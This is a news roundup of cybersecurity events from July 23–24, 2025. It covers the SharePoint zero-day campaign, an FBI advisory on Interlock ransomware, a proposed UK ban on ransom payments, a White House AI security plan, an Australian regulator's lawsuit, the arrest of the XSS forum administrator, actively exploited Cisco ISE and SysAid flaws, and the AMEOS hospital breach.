Cybersecurity Storm: Hacks, Ransomware and Crackdowns Rock the Globe (July 23–24, 2025)

The past two days saw a whirlwind of cybersecurity developments worldwide – from high-stakes cyber-espionage campaigns pivoting to ransomware, to governments launching bold new security initiatives and threat actors facing law enforcement crackdowns. Below is a comprehensive roundup of the major cybersecurity news from July 23–24, 2025, spanning data breaches, ransomware threats, newly disclosed vulnerabilities, and policy shifts.

Chinese Hackers Exploit SharePoint Zero-Day, 400+ Victims and US Agencies Hit

A cyber-espionage campaign exploiting a zero-day vulnerability in Microsoft SharePoint Server escalated dramatically, now including ransomware deployment. Microsoft revealed that a hacker group it tracks as “Storm-2603” (linked with China) has been exploiting an incomplete SharePoint patch to compromise systems reuters.com. By July 23, at least 400 organizations had been breached – a sharp jump from 100 reported victims earlier in the week reuters.com. “There are many more, because not all attack vectors have left artifacts that we could scan for,” warned Vaisha Bernard, chief hacker at Eye Security, which first flagged the attacks reuters.com. The campaign struck multiple U.S. government agencies: sources say victims include the Department of Homeland Security, Department of Energy’s National Nuclear Security Administration, the Department of Education, and the National Institutes of Health securityweek.com. One NIH spokesperson confirmed a server was compromised (additional servers were isolated as a precaution) reuters.com. The breaches are still being assessed, though the Energy Department noted no evidence of classified data loss securityweek.com. Initially a spy operation aimed at data theft, the activity took a dangerous turn – Microsoft reported that since July 18 the Storm-2603 actors have started seeding ransomware on some hacked SharePoint servers securityweek.com securityweek.com. Microsoft observed the attackers deploying LockBit and Warlock ransomware payloads in these intrusions, potentially to cause disruption alongside espionage securityweek.com. This marks a concerning escalation, as state-affiliated hacking rarely uses ransomware. Both Microsoft and Google have attributed the SharePoint exploits to Chinese state-sponsored groups (codenamed Linen Typhoon and Violet Typhoon by Microsoft), but Beijing has denied involvement reuters.com. The SharePoint zero-day, dubbed “Toolshell,” was patched by Microsoft on an emergency basis, but only after attackers had been active since early July securityweek.com. Cybersecurity officials warn organizations to apply these patches immediately and hunt for compromise, given the breadth of the attacks and the addition of ransomware securityweek.com securityweek.com.

FBI Alert: “Interlock” Ransomware Operation Ramping Up Threats

U.S. agencies issued a joint cybersecurity advisory warning about a rising ransomware threat dubbed “Interlock.” On July 23, the FBI, CISA, HHS, and MS-ISAC published indicators and techniques associated with Interlock ransomware, which has been targeting critical infrastructure sectors in North America and Europe industrialcyber.co. First observed in late 2024, Interlock’s tactics are notable for an uncommon initial access method: “FBI observed actors obtaining initial access via drive-by download from compromised legitimate websites, which is an uncommon method among ransomware groups,” the advisory noted industrialcyber.co. Attackers trick victims via a so-called “ClickFix” social engineering technique – presenting a fake browser error or CAPTCHA that convinces users to run a malicious payload industrialcyber.co industrialcyber.co. Once inside, Interlock operators conduct typical ransomware double-extortion: they exfiltrate data and then encrypt systems, focusing on virtual machines while leaving host OS files untouched industrialcyber.co industrialcyber.co. Victims are given a code and directed to a Tor site rather than a direct ransom demand, putting pressure on organizations to negotiate in secret industrialcyber.co. Notably, security researchers observed that Interlock has also distributed information-stealing malware (like Lumma and Berserk stealers) during its attacks to harvest credentials scworld.com. The impact on healthcare has been severe – Interlock was behind high-profile ransomware incidents against hospitals, and analysts suspect it may be linked to or reusing tools from the Rhysida ransomware gang scworld.com. The FBI alert comes just days after Japanese authorities released a free decryptor for Phobos ransomware, signaling heightened global efforts against ransomware scworld.com. Officials urge organizations to shore up defenses: the new alert provides known Indicators of Compromise and advises implementing robust endpoint protections and user awareness to thwart Interlock’s crafty infection methods industrialcyber.co industrialcyber.co.

UK Moves to Ban Ransomware Payments by Critical Services

The United Kingdom unveiled plans for a groundbreaking ransomware countermeasure: a targeted ban on paying ransoms in the public sector and critical infrastructure. On July 23, the UK government announced it will consult on new rules prohibiting public bodies and critical national infrastructure operators (like the NHS, local councils, schools, and utilities) from meeting hackers’ ransom demands industrialcyber.co. This proposal earned strong support – about 72% of respondents in a public consultation favored a ban, believing it will reduce funds flowing to cybercriminals and deter attacks on essential services industrialcyber.co. If implemented, it would be the first UK law specifically outlawing certain ransomware payments industrialcyber.co industrialcyber.co. The government also floated a broader “ransomware payment prevention regime” for the private sector, potentially requiring companies to notify authorities before paying ransoms and get guidance (e.g. to avoid paying sanctioned groups) industrialcyber.co. Security Minister Dan Jarvis emphasized the stakes in a blunt statement: “Ransomware is a predatory crime that puts the public at risk, wrecks livelihoods and threatens the services we depend on. That’s why we’re determined to smash the cyber criminal business model and protect the services we all rely on” industrialcyber.co. The head of resilience at the UK’s NCSC, Jonathon Ellison, praised the measures for undermining criminals’ revenue streams, but cautioned that ransomware remains an evolving threat – urging all organizations, even those not covered by the ban, to strengthen their defenses and incident response plans industrialcyber.co. By choking off ransom payouts, UK officials aim to make Britain a less attractive target. However, the move will spark debate: some experts warn that if victims cannot pay, determined ransomware gangs might double down on data theft and extortion. The UK is proceeding carefully, gathering industry input and pledging guidance to help implement the new rules industrialcyber.co industrialcyber.co.

White House Launches AI Cybersecurity Strategy to “Win the AI Race”

At the policy level, the Trump Administration rolled out a comprehensive AI Cybersecurity Action Plan on July 24, underscoring the intersection of artificial intelligence and cyber defense. The 24-page plan – part of President Trump’s broader “Winning the AI Race” initiative – outlines over 90 federal actions to cement U.S. leadership in AI, with cybersecurity as a core theme abcnews.go.com abcnews.go.com. In particular, the strategy emphasizes “secure by design” principles for AI systems used in critical infrastructure and national security cybernewscentre.com. The Department of Homeland Security was directed to provide guidance on AI system vulnerabilities and, notably, to establish a new AI Information Sharing and Analysis Center (AI-ISAC) dedicated to coordinating threat intelligence on AI-related cyber threats cybernewscentre.com cybernewscentre.com. This would create a formal channel for government and industry to share warnings about malicious uses of AI – such as AI-driven phishing, automated hacking, or data poisoning attacks – and to rapidly respond. The plan also calls on NIST to integrate AI into cyber incident response playbooks and on agencies to involve their Chief AI Officers in handling cyber incidents cybernewscentre.com cybernewscentre.com. While aiming to harden defenses, the plan is equally focused on offense in the global tech arena. Trump officials framed it as critical to outpacing China in AI and preventing “Orwellian uses” of AI by adversaries whitehouse.gov whitehouse.gov. However, the aggressive pro-innovation slant raised some eyebrows. Critics like Public Citizen argued the plan “prioritizes corporate profits over public safety” by loosening regulations on AI development abcnews.go.com. Still, cybersecurity leaders broadly welcomed the attention to AI’s security dimension. They note that as AI is rapidly adopted in finance, healthcare, and government, AI systems themselves could become targets or tools of attack – so initiatives like the AI-ISAC are timely to help defenders keep pace cybernewscentre.com. The White House is expected to follow up with executive orders to implement pieces of the plan in the coming weeks abcnews.go.com.

Australian Regulator Sues Financial Firm After Dark Web Data Leak

In Australia, a major enforcement action underscored the consequences of lax cybersecurity. The Australian Securities and Investments Commission (ASIC) announced on July 22 that it is suing Fortnum Private Wealth, a financial advice company, for allegedly failing to adequately manage cybersecurity risks businessnewsaustralia.com businessnewsaustralia.com. ASIC’s lawsuit claims Fortnum’s negligence led to a series of breaches from 2021 to 2023 – including a devastating cyberattack that resulted in personal data of nearly 9,828 clients being published on the dark web businessnewsaustralia.com businessnewsaustralia.com. According to the filings, Fortnum had only introduced a basic cybersecurity policy in April 2021 and did not enforce even minimal security training or requirements for its network of advisors businessnewsaustralia.com. Multiple warning signs were ignored: the firm suffered at least five cyber incidents in 2021–2022 (email account compromises and phishing attacks on its affiliate practices), yet failed to strengthen its defenses businessnewsaustralia.com businessnewsaustralia.com. The final blow came in September 2022 when attackers breached a Fortnum affiliate (Wealthwise) and exfiltrated 200 GB of sensitive client data, later dumping it online businessnewsaustralia.com. Exposed information included identification documents, tax file numbers, and financial account details businessnewsaustralia.com – a treasure trove for fraudsters. ASIC argues that Fortnum fell below its legal obligations as a licensed financial services provider, and is seeking fines and court orders businessnewsaustralia.com. “Fortnum’s alleged failure to adequately manage cybersecurity risks exposed the company, its representatives and their clients to an unacceptable level of risk,” said ASIC Chair Joe Longo, emphasizing that companies entrusted with confidential data must be held accountable businessnewsaustralia.com. This case is one of the first where ASIC is taking a firm to court purely over cybersecurity compliance. It puts Australian businesses on notice that regulators are no longer treating cybersecurity as just an IT issue – it’s now a boardroom liability. The lawsuit’s outcome will be closely watched, as it may set a precedent for how regulators worldwide penalize companies for data breaches caused by poor security practices businessnewsaustralia.com businessnewsaustralia.com.

Europol Busts Administrator of Major Cybercrime Forum

A coordinated law enforcement operation has taken down a kingpin of the cybercriminal underground. Europol and Ukrainian authorities arrested an individual in Kyiv suspected to be the administrator of XSS.is, one of the world’s largest Russian-language hacking forums reuters.com reuters.com. Announced July 23, the arrest followed a complex investigation led by French cybercrime units in cooperation with Europol. The unnamed suspect is accused of running XSS for years, amassing over €7 million in illicit profits reuters.com. “The forum’s administrator was not only a technical operator but is believed to have played a central role in enabling criminal activity,” Europol said in a statement reuters.com. Acting as a “trusted third party,” the admin allegedly arbitrated deals between cybercriminals, provided escrow services for transactions, and even operated a private encrypted messaging service (“thesecure.biz”) catering to criminals reuters.com. The XSS forum, with over 50,000 registered users, has for roughly a decade served as a bustling marketplace for stolen data, malware, ransomware negotiation services, and hacking tools reuters.com reuters.com. It’s infamous as a hub where ransomware affiliates find partners and breach data is bought and sold. Shutting down XSS strikes a significant blow to this ecosystem. The suspect’s arrest came as he crossed from Slovakia into Ukraine and was swiftly detained by the Ukrainian cyber police, according to Europol’s report reuters.com. This high-profile bust follows a trend of international crackdowns on cybercrime forums (preceded by raids on Genesis Market and BreachForums earlier in the year). Cybersecurity experts say disrupting these forums creates turmoil for criminals – forcing them to scatter to smaller, less trusted platforms – albeit often only temporarily. Europol highlighted that intelligence from this operation will lead to further investigations and arrests. For now, the raid sends a clear message: even anonymous dark web operators can be unmasked and brought to justice when global authorities coordinate resources.

Critical Vulnerabilities Under Active Exploitation (Cisco ISE & SysAid)

Several newly disclosed software vulnerabilities grabbed attention as hackers rushed to exploit them and authorities sounded alarms. Networking giant Cisco warned on July 22 that attackers are actively targeting three “maximum severity” flaws in its Identity Services Engine (ISE) network access control product bleepingcomputer.com. These vulnerabilities – all rated CVSS 10.0 – allow unauthenticated remote code execution as root on ISE servers bleepingcomputer.com bleepingcomputer.com. In other words, an external hacker could completely take over an unpatched ISE system without credentials. Cisco had issued patches (for CVE-2025-20281, -20282, and -20337) in late June and mid-July bleepingcomputer.com bleepingcomputer.com, but now confirms in-the-wild attacks are happening. While details of the exploits are scarce, the company “became aware of attempted exploitation… in the wild” by July 21 and is urging all organizations to update immediately bleepingcomputer.com bleepingcomputer.com. There are no workarounds for these ISE flaws, and they pose a serious risk if left unpatched – ISE is widely used by enterprises to enforce network logins, so a compromise could let hackers pivot deeper into corporate networks bleepingcomputer.com bleepingcomputer.com. Meanwhile, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added two critical vulnerabilities in SysAid, a popular IT helpdesk software, to its Known Exploited Vulnerabilities catalog after finding evidence of active exploitation thehackernews.com thehackernews.com. These bugs (CVE-2025-2775 and CVE-2025-2776) stem from improper XML input handling and can lead to administrator account takeover and arbitrary file reads on the server thehackernews.com. Essentially, attackers could abuse these flaws to steal sensitive data or potentially chain them into remote code execution. The vendor had patched the issues in an update back in March 2025 thehackernews.com, but organizations that haven’t applied the fix are now at risk. CISA has given U.S. federal agencies a deadline of August 12 to remediate the SysAid bugs, indicating the threat is serious and not hypothetical thehackernews.com. Security experts note that once vulnerabilities are publicly disclosed and patched, criminals often reverse-engineer the fixes to quickly develop exploits – as appears to be the case here. The flurry of warnings is a reminder for defenders: keep critical systems up to date, because attackers are watching vendor bulletins closely and pouncing on unpatched targets.

Major Data Breach Hits European Hospital Network

Another significant breach came to light as AMEOS Group, a major Swiss-headquartered healthcare network, disclosed a cyberattack that may have exposed large volumes of sensitive data. AMEOS operates over 100 hospitals and clinics across Switzerland, Germany, and Austria, with 18,000 employees serving thousands of patients bleepingcomputer.com bleepingcomputer.com. On July 22, the company announced that despite “extensive security measures,” external hackers gained unauthorized access to its IT systems and likely accessed confidential information bleepingcomputer.com. Data potentially compromised includes patient medical details, employee records, and partner company contacts – essentially any personal data stored in AMEOS’s network bleepingcomputer.com. “Data belonging to patients, employees, and partners… may have been affected due to unauthorized access,” the breach notification stated bleepingcomputer.com. AMEOS has shut down all IT systems as a precaution, severing internal and external network connections, and engaged external forensic experts to investigate bleepingcomputer.com. So far there is no indication that stolen data has been leaked or sold online, and the organization says it has no evidence of any ransomware payload being used bleepingcomputer.com bleepingcomputer.com. Notably, no known ransomware group has claimed responsibility, leaving the attackers’ identity and motive unclear bleepingcomputer.com. The incident, which actually occurred on July 7 but was revealed publicly on the 22nd, has been reported to data protection regulators and law enforcement bleepingcomputer.com bleepingcomputer.com. AMEOS is advising all patients and staff to remain vigilant against potential phishing or fraud attempts using their data bleepingcomputer.com. This breach highlights the continued danger facing the healthcare sector globally – hospitals remain prime targets for cybercriminals due to the wealth of personal and medical data they hold, and the potential pressure to pay ransom to restore services. European healthcare providers, in particular, have suffered a string of attacks in recent years, prompting authorities to call for stronger cyber defenses in critical services. The AMEOS incident will likely reignite discussions on requiring higher cybersecurity standards and transparency in the healthcare industry, much as recent attacks have done in the U.S. and elsewhere.

Each of these stories from July 23–24, 2025, showcases a different facet of today’s cybersecurity landscape: state-backed hacking campaigns morphing into ransomware havoc, governments adopting tougher stances on cybercrime, threat actors exploiting newly revealed cracks in our software, and global efforts to disrupt the criminal infrastructure that enables attacks. It’s a stark reminder that cybersecurity is truly a 24/7 global battle – with critical developments unfolding even over a 48-hour span. Staying informed and proactive is essential as organizations and individuals alike navigate the risks ahead.

Sources: reuters.com securityweek.com industrialcyber.co industrialcyber.co businessnewsaustralia.com reuters.com bleepingcomputer.com thehackernews.com bleepingcomputer.com